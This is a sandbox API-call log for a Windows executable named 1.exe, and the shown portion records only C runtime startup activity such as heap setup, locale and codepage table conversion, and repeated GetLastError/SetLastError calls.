# Flog Txt Version 1 # Analyzer Version: 3.0.2 # Analyzer Build Date: Jun 6 2019 12:21:16 # Log Creation Date: 04.07.2019 17:39:07.009 Process: id = "1" image_name = "1.exe" filename = "c:\\users\\fd1hvy\\desktop\\1.exe" page_root = "0x7425a000" os_pid = "0xc48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\1.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x2e8 [0034.011] GetStartupInfoW (in: lpStartupInfo=0xcffdd0 | out: lpStartupInfo=0xcffdd0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0034.011] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0034.011] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2a60000 [0034.017] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0034.017] GetProcAddress (hModule=0x75e90000, lpProcName="FlsAlloc") returned 0x75ea4ae0 [0034.017] GetProcAddress (hModule=0x75e90000, lpProcName="FlsGetValue") returned 0x75ea4b20 [0034.017] GetProcAddress (hModule=0x75e90000, lpProcName="FlsSetValue") returned 0x75ea4b40 [0034.017] GetProcAddress (hModule=0x75e90000, lpProcName="FlsFree") returned 0x75ea4b00 [0034.018] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x214) returned 0x2a605a8 [0034.018] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0034.018] GetCurrentThreadId () returned 0x2e8 [0034.018] GetStartupInfoW (in: lpStartupInfo=0xcffd6c | out: lpStartupInfo=0xcffd6c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0034.018] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x800) returned 0x2a607c8 [0034.018] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.018] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.019] SetHandleCount (uNumber=0x20) returned 0x20 [0034.019] GetCommandLineA () returned="\"C:\\Users\\FD1HVy\\Desktop\\1.exe\" " [0034.019] GetEnvironmentStringsW () returned 0xf5ee60* [0034.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0034.019] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x565) returned 0x2a60fd0 [0034.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2a60fd0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0034.019] FreeEnvironmentStringsW (penv=0xf5ee60) returned 1 [0034.019] GetLastError () returned 0xcb [0034.019] SetLastError (dwErrCode=0xcb) [0034.019] GetLastError () returned 0xcb [0034.019] SetLastError (dwErrCode=0xcb) [0034.019] GetLastError () returned 0xcb [0034.019] SetLastError (dwErrCode=0xcb) [0034.019] GetACP () returned 0x4e4 [0034.019] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x220) returned 0x2a61540 [0034.019] GetLastError () returned 0xcb [0034.019] SetLastError (dwErrCode=0xcb) [0034.019] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.019] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcffd34 | out: lpCPInfo=0xcffd34) returned 1 [0034.019] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0xcff800 | out: lpCPInfo=0xcff800) returned 1 [0034.019] GetLastError () returned 0xcb [0034.019] SetLastError (dwErrCode=0xcb) [0034.019] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcffc14, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.020] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcffc14, cbMultiByte=256, lpWideCharStr=0xcff578, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.020] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0xcff814 | out: lpCharType=0xcff814) returned 1 [0034.020] GetLastError () returned 0xcb [0034.020] SetLastError (dwErrCode=0xcb) [0034.020] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcffc14, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.020] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcffc14, cbMultiByte=256, lpWideCharStr=0xcff548, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茋魫\x9bĀ") returned 256 [0034.020] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茋魫\x9bĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.020] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茋魫\x9bĀ", cchSrc=256, lpDestStr=0xcff338, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0034.020] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0xcffb14, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xee\xa1\xd9\x40\x4c\xfd\xcf", lpUsedDefaultChar=0x0) returned 256 [0034.020] GetLastError () returned 0xcb [0034.020] SetLastError (dwErrCode=0xcb) [0034.020] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcffc14, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.020] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0xcffc14, cbMultiByte=256, lpWideCharStr=0xcff568, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茋魫\x9bĀ") returned 256 [0034.020] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茋魫\x9bĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.020] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ茋魫\x9bĀ", cchSrc=256, lpDestStr=0xcff358, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0034.020] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0xcffa14, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xee\xa1\xd9\x40\x4c\xfd\xcf", lpUsedDefaultChar=0x0) returned 256 [0034.020] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x9bf728, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\1.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\1.exe")) returned 0x1d [0034.020] GetLastError () returned 0x0 [0034.020] SetLastError (dwErrCode=0x0) [0034.020] GetLastError () returned 0x0 [0034.020] SetLastError (dwErrCode=0x0) [0034.020] GetLastError () returned 0x0 [0034.020] SetLastError (dwErrCode=0x0) [0034.020] GetLastError () returned 0x0 [0034.020] SetLastError (dwErrCode=0x0) [0034.020] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.021] GetLastError () returned 0x0 [0034.021] SetLastError (dwErrCode=0x0) [0034.022] GetLastError () returned 0x0 [0034.022] SetLastError (dwErrCode=0x0) [0034.022] GetLastError () returned 0x0 [0034.022] SetLastError (dwErrCode=0x0) [0034.022] GetLastError () returned 0x0 [0034.033] SetLastError (dwErrCode=0x0) [0034.033] GetLastError () returned 0x0 [0034.033] SetLastError (dwErrCode=0x0) [0034.033] GetLastError () returned 0x0 [0034.033] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 [0034.034] SetLastError (dwErrCode=0x0) [0034.034] GetLastError () returned 0x0 